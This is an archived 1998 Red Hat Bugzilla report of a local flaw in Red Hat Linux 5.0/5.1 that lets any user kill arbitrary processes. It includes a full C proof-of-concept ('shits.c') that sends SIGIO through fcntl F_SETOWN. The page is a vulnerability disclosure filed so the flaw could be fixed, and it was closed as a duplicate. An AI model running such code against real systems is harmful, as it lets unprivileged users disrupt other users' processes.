Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 79 - Rootshell reported bug, shits.c
Summary: Rootshell reported bug, shits.c
Keywords:
Status: CLOSED DUPLICATE of bug 78
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: basesystem
Version: 5.0
Hardware: i386
OS: Linux
high
medium
Target Milestone: ---
Assignee: David Lawrence
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1998-11-15 16:14 UTC by penguin
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 1998-11-16 13:52:04 UTC


Attachments (Terms of Use)

Description penguin 1998-11-15 16:14:28 UTC
Allows anyone to kill any process - even if not root.
Effects 5.0 and 5.1,  have not tested on 5.2
---
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
int s, p;
if (argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}

Comment 1 Bill Nottingham 1998-11-16 13:52:59 UTC
*** This bug has been marked as a duplicate of 78 ***


Note You need to log in before you can comment on or make changes to this bug.